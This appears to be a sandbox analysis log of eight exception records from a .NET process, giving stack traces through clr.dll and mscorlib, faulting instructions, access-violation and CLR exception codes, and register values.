__exception__ June 21, 2021, 12:58 p.m.	stacktrace: 0x67929e 0x678799 0x678329 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8 CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2 LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63 CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998 CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726 CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68 CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4 DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4 DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37 DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841 LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9 mscorlib+0x2d3711 @ 0x6eeb3711 mscorlib+0x308f2d @ 0x6eee8f2d mscorlib+0x2cb060 @ 0x6eeab060 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737 mscorlib+0x2d36ad @ 0x6eeb36ad mscorlib+0x308f2d @ 0x6eee8f2d microsoft+0x50c17 @ 0x72050c17 microsoft+0x3f33f @ 0x7203f33f microsoft+0x3edf8 @ 0x7203edf8 microsoft+0x3e3b9 @ 0x7203e3b9 0x670234 0x6700b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 d2 1d 7e 6e c7 45 e8 00 00 00 00 c7 45 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x67930b registers.esp: 2088820 registers.edi: 2088840 registers.eax: 0 registers.ebp: 2088852 registers.edx: 36901416 registers.ebx: 2089152 registers.esi: 36901416 registers.ecx: 0	1
__exception__ June 21, 2021, 12:58 p.m.	stacktrace: 0x6792b0 0x678799 0x678329 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8 CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2 LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63 CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998 CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726 CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68 CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4 DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4 DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37 DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841 LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9 mscorlib+0x2d3711 @ 0x6eeb3711 mscorlib+0x308f2d @ 0x6eee8f2d mscorlib+0x2cb060 @ 0x6eeab060 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737 mscorlib+0x2d36ad @ 0x6eeb36ad mscorlib+0x308f2d @ 0x6eee8f2d microsoft+0x50c17 @ 0x72050c17 microsoft+0x3f33f @ 0x7203f33f microsoft+0x3edf8 @ 0x7203edf8 microsoft+0x3e3b9 @ 0x7203e3b9 0x670234 0x6700b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 d2 1d 7e 6e c7 45 e8 00 00 00 00 c7 45 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x67930b registers.esp: 2088820 registers.edi: 2088840 registers.eax: 0 registers.ebp: 2088852 registers.edx: 45351148 registers.ebx: 2089152 registers.esi: 45351148 registers.ecx: 0	1
__exception__ June 21, 2021, 12:58 p.m.	stacktrace: 0x67e9e4 0x67df17 0x67953f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737 mscorlib+0x2d3711 @ 0x6eeb3711 mscorlib+0x308f2d @ 0x6eee8f2d mscorlib+0x2cb060 @ 0x6eeab060 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737 mscorlib+0x2d36ad @ 0x6eeb36ad mscorlib+0x308f2d @ 0x6eee8f2d microsoft+0x50c17 @ 0x72050c17 microsoft+0x3f33f @ 0x7203f33f microsoft+0x3edf8 @ 0x7203edf8 microsoft+0x3e3b9 @ 0x7203e3b9 0x670234 0x6700b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 0f bf 01 eb 31 8d 55 e0 0f b6 01 88 02 0f b6 41 exception.instruction: movsx eax, word ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: mscorlib+0x305ad2 exception.address: 0x6eee5ad2 registers.esp: 2091124 registers.edi: 2091148 registers.eax: 0 registers.ebp: 2091160 registers.edx: 0 registers.ebx: 45700300 registers.esi: 2285895686 registers.ecx: 2285895686	1
__exception__ June 21, 2021, 12:58 p.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x6fd51194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x6fc22ba1 mscorlib+0x2f45b0 @ 0x6eed45b0 mscorlib+0x2f74d4 @ 0x6eed74d4 mscorlib+0x30c46d @ 0x6eeec46d system+0xea3b4 @ 0x644ea3b4 system+0xcec2d @ 0x644cec2d system+0x6f7869 @ 0x658e7869 system+0x6f6e71 @ 0x658e6e71 system+0x6f3892 @ 0x658e3892 system+0x6f3514 @ 0x658e3514 system+0x6f42ec @ 0x658e42ec 0x5c051a 0x5c00f4 0x5c00b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 3534112 registers.edi: 0 registers.eax: 3534112 registers.ebp: 3534192 registers.edx: 0 registers.ebx: 7547920 registers.esi: 6837688 registers.ecx: 2373609504	1
__exception__ June 21, 2021, 12:58 p.m.	stacktrace: 0x5c929e 0x5c8799 0x5c8329 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8 CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2 LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63 CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998 CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726 CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68 CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4 DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4 DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37 DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841 LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9 mscorlib+0x2d3711 @ 0x6eeb3711 mscorlib+0x308f2d @ 0x6eee8f2d mscorlib+0x2cb060 @ 0x6eeab060 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737 mscorlib+0x2d36ad @ 0x6eeb36ad mscorlib+0x308f2d @ 0x6eee8f2d microsoft+0x50c17 @ 0x72050c17 microsoft+0x3f33f @ 0x7203f33f microsoft+0x3edf8 @ 0x7203edf8 microsoft+0x3e3b9 @ 0x7203e3b9 0x5c0234 0x5c00b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 d2 1d 89 6e c7 45 e8 00 00 00 00 c7 45 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5c930b registers.esp: 3529860 registers.edi: 3529880 registers.eax: 0 registers.ebp: 3529892 registers.edx: 37360168 registers.ebx: 3530192 registers.esi: 37360168 registers.ecx: 0	1
__exception__ June 21, 2021, 12:58 p.m.	stacktrace: 0x5c92b0 0x5c8799 0x5c8329 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8 CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2 LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63 CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998 CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726 CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68 CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4 DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4 DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37 DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841 LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9 mscorlib+0x2d3711 @ 0x6eeb3711 mscorlib+0x308f2d @ 0x6eee8f2d mscorlib+0x2cb060 @ 0x6eeab060 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737 mscorlib+0x2d36ad @ 0x6eeb36ad mscorlib+0x308f2d @ 0x6eee8f2d microsoft+0x50c17 @ 0x72050c17 microsoft+0x3f33f @ 0x7203f33f microsoft+0x3edf8 @ 0x7203edf8 microsoft+0x3e3b9 @ 0x7203e3b9 0x5c0234 0x5c00b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 d2 1d 89 6e c7 45 e8 00 00 00 00 c7 45 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5c930b registers.esp: 3529860 registers.edi: 3529880 registers.eax: 0 registers.ebp: 3529892 registers.edx: 45801128 registers.ebx: 3530192 registers.esi: 45801128 registers.ecx: 0	1
__exception__ June 21, 2021, 12:58 p.m.	stacktrace: 0x5ce9e4 0x5cdf17 0x5c953f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737 mscorlib+0x2d3711 @ 0x6eeb3711 mscorlib+0x308f2d @ 0x6eee8f2d mscorlib+0x2cb060 @ 0x6eeab060 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737 mscorlib+0x2d36ad @ 0x6eeb36ad mscorlib+0x308f2d @ 0x6eee8f2d microsoft+0x50c17 @ 0x72050c17 microsoft+0x3f33f @ 0x7203f33f microsoft+0x3edf8 @ 0x7203edf8 microsoft+0x3e3b9 @ 0x7203e3b9 0x5c0234 0x5c00b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 0f bf 01 eb 31 8d 55 e0 0f b6 01 88 02 0f b6 41 exception.instruction: movsx eax, word ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: mscorlib+0x305ad2 exception.address: 0x6eee5ad2 registers.esp: 3532164 registers.edi: 3532188 registers.eax: 0 registers.ebp: 3532200 registers.edx: 0 registers.ebx: 46157228 registers.esi: 9896034 registers.ecx: 9896034	1
__exception__ June 21, 2021, 12:58 p.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x6fd51194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x6fc22ba1 mscorlib+0x2f45b0 @ 0x6eed45b0 mscorlib+0x2f73b5 @ 0x6eed73b5 mscorlib+0x2eeaf8 @ 0x6eeceaf8 mscorlib+0x2eea8f @ 0x6eecea8f 0x9104a6 0x9100f4 0x9100b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 4059828 registers.edi: 0 registers.eax: 4059828 registers.ebp: 4059908 registers.edx: 0 registers.ebx: 6193376 registers.esi: 5515048 registers.ecx: 4107524897	1
